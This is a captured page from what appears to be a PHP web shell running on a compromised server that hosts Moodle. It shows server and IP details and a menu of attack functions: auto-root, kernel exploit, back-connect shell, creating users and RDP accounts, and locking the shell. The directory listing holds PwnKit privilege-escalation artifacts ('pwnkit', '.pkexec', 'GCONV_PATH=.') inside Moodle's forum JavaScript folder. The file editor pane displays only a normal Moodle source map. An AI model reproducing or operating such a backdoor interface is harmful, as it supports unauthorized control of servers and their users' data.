Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
forum /
amd /
build /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
grades
[ DIR ]
drwxrwxrwx
local
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
discussion.min.js
4.57
KB
-rwxrwxrwx
discussion.min.js.map
14.55
KB
-rwxrwxrwx
discussion_list.min.js
3.32
KB
-rwxrwxrwx
discussion_list.min.js.map
8.69
KB
-rwxrwxrwx
discussion_nested_v2.min.js
11.97
KB
-rwxrwxrwx
discussion_nested_v2.min.js.ma...
22.6
KB
-rwxrwxrwx
favourite_toggle.min.js
1.16
KB
-rwxrwxrwx
favourite_toggle.min.js.map
3.72
KB
-rwxrwxrwx
form-user-selector.min.js
1.11
KB
-rwxrwxrwx
form-user-selector.min.js.map
3.78
KB
-rwxrwxrwx
forum_events.min.js
407
B
-rwxrwxrwx
forum_events.min.js.map
1.24
KB
-rwxrwxrwx
inpage_reply.min.js
3.93
KB
-rwxrwxrwx
inpage_reply.min.js.map
12.41
KB
-rwxrwxrwx
lock_toggle.min.js
895
B
-rwxrwxrwx
lock_toggle.min.js.map
2.9
KB
-rwxrwxrwx
pin_toggle.min.js
1.35
KB
-rwxrwxrwx
pin_toggle.min.js.map
3.88
KB
-rwxrwxrwx
posts_list.min.js
2.15
KB
-rwxrwxrwx
posts_list.min.js.map
6.44
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
repository.min.js
2.35
KB
-rwxrwxrwx
repository.min.js.map
7.5
KB
-rwxrwxrwx
selectors.min.js
2.09
KB
-rwxrwxrwx
selectors.min.js.map
4.68
KB
-rwxrwxrwx
subscription_toggle.min.js
1.17
KB
-rwxrwxrwx
subscription_toggle.min.js.map
3.58
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : posts_list.min.js.map
{"version":3,"file":"posts_list.min.js","sources":["../src/posts_list.js"],"sourcesContent":["// This file is part of Moodle - http://moodle.org/\n//\n// Moodle is free software: you can redistribute it and/or modify\n// it under the terms of the GNU General Public License as published by\n// the Free Software Foundation, either version 3 of the License, or\n// (at your option) any later version.\n//\n// Moodle is distributed in the hope that it will be useful,\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n// GNU General Public License for more details.\n//\n// You should have received a copy of the GNU General Public License\n// along with Moodle. If not, see <http://www.gnu.org/licenses/>.\n\n/**\n * This module is the highest level module for the calendar. It is\n * responsible for initialising all of the components required for\n * the calendar to run. It also coordinates the interaction between\n * components by listening for and responding to different events\n * triggered within the calendar UI.\n *\n * @module mod_forum/posts_list\n * @package mod_forum\n * @copyright 2019 Peter Dias\n * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later\n */\ndefine([\n 'jquery',\n 'core/templates',\n 'core/notification',\n 'core/pending',\n 'core/yui',\n 'mod_forum/selectors',\n 'mod_forum/inpage_reply',\n ], function(\n $,\n Templates,\n Notification,\n Pending,\n Y,\n Selectors,\n InPageReply\n ) {\n\n var registerEventListeners = function(root) {\n root.on('click', Selectors.post.inpageReplyLink, function(e) {\n e.preventDefault();\n // After adding a reply a url hash is being generated that scrolls (points) to the newly added reply.\n // The hash being present causes this scrolling behavior to the particular reply to persists even when\n // another, non-related in-page replay link is being clicked which ultimately causes a bad user experience.\n // A particular solution for this problem would be changing the browser's history state when a url hash is\n // present.\n if (window.location.hash) {\n // Remove the fragment identifier from the url.\n var url = window.location.href.split('#')[0];\n history.pushState({}, document.title, url);\n }\n var pending = new Pending('inpage-reply');\n var currentTarget = $(e.currentTarget).parents(Selectors.post.forumCoreContent);\n var currentSubject = currentTarget.find(Selectors.post.forumSubject);\n var currentRoot = $(e.currentTarget).parents(Selectors.post.forumContent);\n var context = {\n postid: $(currentRoot).data('post-id'),\n \"reply_url\": $(e.currentTarget).attr('href'),\n sesskey: M.cfg.sesskey,\n parentsubject: currentSubject.data('replySubject'),\n canreplyprivately: $(e.currentTarget).data('can-reply-privately'),\n postformat: InPageReply.CONTENT_FORMATS.MOODLE\n };\n\n if (!currentRoot.find(Selectors.post.inpageReplyContent).length) {\n Templates.render('mod_forum/inpage_reply', context)\n .then(function(html, js) {\n return Templates.appendNodeContents(currentTarget, html, js);\n })\n .then(function() {\n return currentRoot.find(Selectors.post.inpageReplyContent)\n .slideToggle(300, pending.resolve).find('textarea').focus();\n })\n .then(function() {\n // Load formchangechecker module.\n Y.use('moodle-core-formchangechecker', () => {\n M.core_formchangechecker.init({formid: `inpage-reply-${context.postid}`});\n });\n return;\n })\n .fail(Notification.exception);\n } else {\n var form = currentRoot.find(Selectors.post.inpageReplyContent);\n form.slideToggle(300, pending.resolve);\n if (form.is(':visible')) {\n form.find('textarea').focus();\n }\n }\n });\n };\n\n return {\n init: function(root) {\n registerEventListeners(root);\n InPageReply.init(root);\n }\n };\n});\n"],"names":["define","$","Templates","Notification","Pending","Y","Selectors","InPageReply","init","root","on","post","inpageReplyLink","e","preventDefault","window","location","hash","url","href","split","history","pushState","document","title","pending","currentTarget","parents","forumCoreContent","currentSubject","find","forumSubject","currentRoot","forumContent","context","postid","data","attr","sesskey","M","cfg","parentsubject","canreplyprivately","postformat","CONTENT_FORMATS","MOODLE","inpageReplyContent","length","form","slideToggle","resolve","is","focus","render","then","html","js","appendNodeContents","use","core_formchangechecker","formid","fail","exception","registerEventListeners"],"mappings":";;;;;;;;;;;;AA2BAA,8BAAO,CACC,SACA,iBACA,oBACA,eACA,WACA,sBACA,2BACD,SACCC,EACAC,UACAC,aACAC,QACAC,EACAC,UACAC,mBAwDG,CACHC,KAAM,SAASC,OAtDU,SAASA,MAClCA,KAAKC,GAAG,QAASJ,UAAUK,KAAKC,iBAAiB,SAASC,MACtDA,EAAEC,iBAMEC,OAAOC,SAASC,KAAM,KAElBC,IAAMH,OAAOC,SAASG,KAAKC,MAAM,KAAK,GAC1CC,QAAQC,UAAU,GAAIC,SAASC,MAAON,SAEtCO,QAAU,IAAIrB,QAAQ,gBACtBsB,cAAgBzB,EAAEY,EAAEa,eAAeC,QAAQrB,UAAUK,KAAKiB,kBAC1DC,eAAiBH,cAAcI,KAAKxB,UAAUK,KAAKoB,cACnDC,YAAc/B,EAAEY,EAAEa,eAAeC,QAAQrB,UAAUK,KAAKsB,cACxDC,QAAU,CACVC,OAAQlC,EAAE+B,aAAaI,KAAK,qBACfnC,EAAEY,EAAEa,eAAeW,KAAK,QACrCC,QAASC,EAAEC,IAAIF,QACfG,cAAeZ,eAAeO,KAAK,gBACnCM,kBAAmBzC,EAAEY,EAAEa,eAAeU,KAAK,uBAC3CO,WAAYpC,YAAYqC,gBAAgBC,WAGvCb,YAAYF,KAAKxB,UAAUK,KAAKmC,oBAAoBC,OAiBlD,KACCC,KAAOhB,YAAYF,KAAKxB,UAAUK,KAAKmC,oBAC3CE,KAAKC,YAAY,IAAKxB,QAAQyB,SAC1BF,KAAKG,GAAG,aACRH,KAAKlB,KAAK,YAAYsB,aApB1BlD,UAAUmD,OAAO,yBAA0BnB,SACtCoB,MAAK,SAASC,KAAMC,WACVtD,UAAUuD,mBAAmB/B,cAAe6B,KAAMC,OAE5DF,MAAK,kBACKtB,YAAYF,KAAKxB,UAAUK,KAAKmC,oBAClCG,YAAY,IAAKxB,QAAQyB,SAASpB,KAAK,YAAYsB,WAE3DE,MAAK,WAEFjD,EAAEqD,IAAI,iCAAiC,WACnCnB,EAAEoB,uBAAuBnD,KAAK,CAACoD,8BAAwB1B,QAAQC,gBAItE0B,KAAK1D,aAAa2D,cAa3BC,CAAuBtD,MACvBF,YAAYC,KAAKC"}
Close